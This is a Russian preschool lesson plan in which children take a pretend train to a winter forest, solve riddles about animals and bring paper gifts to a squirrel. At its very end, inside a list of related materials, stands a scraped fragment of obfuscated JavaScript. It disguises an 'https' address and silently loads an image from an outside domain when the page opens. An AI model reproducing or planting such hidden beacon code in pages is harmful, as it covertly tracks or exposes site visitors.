Конспект образовательной деятельности в средней группе на тему: "Гостинцы для белочки"
план-конспект занятия по окружающему миру (средняя группа) по теме
Увлекательное занятие - путешествие к белочке в лес. Цель данного занятия - воспитывать у детей стремление прийти на помощь, любовь к природе и животным.
Скачать:
Вложение | Размер |
---|---|
gostintsy_dlya_belochki.doc | 42.5 КБ |
Предварительный просмотр:
МУНИЦИПАЛЬНОЕ БЮДЖЕТНОЕ
ДОШКОЛЬНОЕ ОБРАЗОВАТЕЛЬНОЕ УЧРЕЖДЕНИЕ –
ЦЕНТР РАЗВИТИЯ РЕБЕНКА – ДЕТСКИЙ САД № 9 «СВЕТЛЯЧОК»
Конспект
образовательной деятельности
в средней группе
на тему
«Гостинцы для белочки»
«Гостинцы для белочки»
Цели: познакомить детей с зимним лесом; уточнять знания детей об обитании белочки; развивать внимание, мышление; воспитывать у детей стремление прийти на помощь, любовь к животным и природе.
Материал: костюмы Зайчика и Белочки; шлагбаум; таблички с названиями станций; картинки с изображением сверкающего снега; картинки с изображением следов животных; листок с лесными новостями; дерево из картона; веточки; грибочки и орехи из бумаги; морковка.
Предварительная работа: изготовление и раскрашивание грибочков и орехов из бумаги.
Ход работы:
Раздается стук в дверь. Входит Зайчик.
Зайчик: Здравствуйте, ребята! Я долго добирался из леса, пришел к вам за помощью. Хочу сообщить, что у белочки закончились запасы еды. Ей очень трудно. Ребята, вы можете помочь белочке?
Ответы детей.
Воспитатель: Ребята, а чем питается белочка?
Ответы детей.
Воспитатель: Правильно. Она питается лесными орехами, грибами, желудями. Еще летом белочка запасает на зиму корм и прячет его в кладовых. Ребята, как вы думаете, почему белочка делает запасы еды?
Ответы детей.
Воспитатель: Белочка заранее делает запасы еды, чтобы спокойно зимовать. Но Зайчик нам сообщил, что у белочки закончились запасы. Ребята, давайте поможем белочке и отвезем ей грибочки и орехи, которые мы с вами сделали. Вы согласны?
Ответы детей.
Воспитатель: Тогда предлагаю вам и Зайчику поехать к белочке в лес на нашем поезде «Юные помощники».
Воспитатель выстраивает ребят в поезд.
Воспитатель: Ту-ту! Наш поезд трогается, и мы с вами отправляемся в зимний лес. Ребята, лес — это дом для животных. В зимнее время года лес спит. Деревья, кустарники покрыты снегом. Посмотрите, как снег переливается на солнышке, сверкает разными огоньками.
Воспитатель обращает внимание детей на разложенные картинки с изображением сверкающего снега.
Воспитатель: Вот мы и подъехали к первой станции. Она называется «Загадкино». Чтобы наш поезд пропустили дальше, нам придется отгадать загадки. Попробуем ребята?
Ответы детей.
Воспитатель: Послушайте первую загадку.
Покружилась звездочка
В воздухе немножко,
Села и растаяла
На моей ладошке.
Ответы детей.
Воспитатель: Правильно, это снежинка. Послушайте следующую загадку.
Кто по елкам ловко скачет
И взлетает на дубы?
Кто в дупле орехи прячет,
Сушит на зиму грибы?
Ответы детей.
Воспитатель: Молодцы! Это белочка. Следующая загадка.
Хитрая плутовка,
Рыжая головка,
Хвост пушистый — краса!
А зовут ее …
Ответы детей.
Воспитатель: Правильно, это лиса. Послушайте еще загадку.
Богатырь в лесу растет.
Много лет он проживет.
Украшает лес родной
Он своею красотой.
Ответы детей.
Воспитатель: Молодцы, ребята! Это дуб. И последняя загадка.
Кто зимой холодной
Ходит хмурый и голодный.
Ответы детей.
Воспитатель: Правильно, это волк. Молодцы, ребята! Вы правильно отгадали все загадки. Шлагбаум открывается и мы с вами едем дальше. Посмотрите вокруг: на снегу много следов. Ребята, как вы думаете, чьи это следы?
Воспитатель обращает внимание детей на разложенные картинки с изображением следов животных.
Ответы детей.
Воспитатель: Это следы диких животных, которые живут в лесу. Ребята, каких диких животных вы знаете?
Ответы детей.
Воспитатель: Правильно. Ребята, по следу можно определить, какой зверь передвигался по лесу. Даже можно определить, в какую сторону он побежал. Следы — это значки на снегу. В лесу можно прочитать белую книгу зимы. Страницы у этой книги — снеговые и исписаны они значками. Чтобы прочитать белую книгу зимы, нужно внимательно рассматривать следы. Ребята, незаметно мы с вами подъехали ко второй станции. Называется она «Угадай-ка». Чтобы наш поезд смог поехать дальше, вы постарайтесь узнать по описанию диких животных. Попробуете отгадать?
Ответы детей.
Воспитатель: Послушайте ребята. Летом у этого зверька серенькая шубка. А с наступлением зимы меняет серенькую шубку на беленькую, чтобы его не заметили на снегу. От лютой стужи спасает пушистая, теплая шерсть. Питается он веточками деревьев, гложет кору. О каком животном идет речь?
Ответы детей.
Воспитатель: Правильно. Это заяц. А теперь послушайте про следующего животного. Он большой, лохматый. Летом любит малину, мед. К зиме накапливает жир. А всю зиму спит. Кто это?
Ответы детей.
Воспитатель: Правильно, ребята. Это медведь. Шлагбаум открылся, мы с вами отправляемся дальше. Ребята, а как зовут детенышей у белочки?
Ответы детей.
Воспитатель: Правильно. Детенышей у белочки зовут бельчата. Ребята, как вы думаете, бельчата обрадуются нашим гостинцам?
Ответы детей.
Воспитатель: Ребята, мы с вами подъехали к третьей станции. Называется она «Отдых». Вы немного устали, поэтому давайте отдохнем и проведем физкультминутку «Белочка».
Белка — рыжая краса,
Любит прыгать без конца.
Все грибочки собирает,
На зиму их запасает.
И бельчата помогают,
Маме-белке собирают:
Шишки, желуди, грибы -
Небывалой красоты!
Вот запасы хороши!
Будут рады малыши.
Зиму будут все встречать,
Прыгать, бегать и скакать.
Дети выполняют движения согласно текста.
Воспитатель: Ребята, мы с вами отдохнули, теперь отправляемся дальше. Следующая станция находится недалеко, мы подъезжаем к станции «Лесные новости». Интересно, какие последние новости в лесу? Сейчас узнаем.
Воспитатель берет листок с лесными новостями.
Воспитатель: Я вам прочитаю лесную новость: «Под деревьями много брошенных, обглоданных веточек. Это означает, что у белочки закончились запасы». Ребята, чтобы открылся шлагбаум, нам тоже следует сообщить свою новость. Какая у нас главная новость?
Ответы детей.
Воспитатель: Наша новость — мы везем гостинцы для белочки. Шлагбаум открывается, и мы с вами приближаемся к дереву, где живет белочка. Ребята, смотрите, около дерева сидит Белочка, а рядом разбросаны обглоданные веточки. Давайте с ней поздороваемся.
Дети и Белочка здороваются.
Воспитатель: Белочка, Зайчик рассказал ребятам, что у тебя закончились запасы еды. Они привезли тебе грибочки и орехи. Возьми их, пожалуйста. Ребята, давайте отдадим белочке наши гостинцы.
Дети отдают белочке гостинцы.
Белочка: Ребята, спасибо вам за ваши гостинцы! Мои бельчата обрадуются. Вы нам очень помогли.
Воспитатель: Ребята, давайте поблагодарим Зайчика, что он не остался равнодушным к беде Белочке и пришел к нам за помощью. У меня в пакетике лежит морковка, которую взяла с собой в путешествие. Давайте угостим Зайчика морковкой.
Дети говорят «спасибо» Зайчику. Отдают ему морковку.
Воспитатель: Ребята, вы все молодцы, что согласились помочь Белочке и привезли ей гостинцы. Давайте попрощаемся с Белочкой и Зайчиком. А нам пора отправляться обратно в путь.
Ребята прощаются с Белочкой и Зайчиком. Вместе с воспитателем возвращаются обратно в путь на поезде «Юные помощники».
По теме: методические разработки, презентации и конспекты
Конспект образовательной деятельности в средней группе с применением ЭОР образовательная область «Речевое развитие» тема занятия «Волшебный лес звуков"
Конспект образовательной деятельности в средней группе с применением ЭОР тема занятия «Волшебный лес звуков"Конспект составлен воспитателем: Волковой Е.Ю.Задачи:Образовательная область: «Речевое...
Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»
Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»Цель: Создание условий тв...
Конспект образовательной деятельности в средней группе, образовательная область «Социально-коммуникативное» Тема: «Путешествие в страну цветов» К коллективному просмотру в рамках дошкольного учреждения для студентов БПК
Добрый день! 26 апреля 2019г. Мной было проведино открытое занятие для студентов. Образовательная область "Социально-коммуникативное"на тему "Путешествие в страну цветов"...
Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Сказка – невеличка про зверей и рукавичку»
Конспект НОД по развитию речи в средней группе с элементами театрализации. Упражнения на развитие связной речи, ЗКР, грамматического строя речи, развитие коммуникативных умений....
Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»
-Организовать деятельность детей по развитию связной монологической и диалогической речи через театрализованную деятельность....
Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»
-Организовать деятельность детей по развитию связной монологической и диалогической речи через театрализованную деятельность....
Материалы для родителей "Учимся вместе". Конспект образовательной деятельности в средней группе "День рождения Белочки!"
\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!...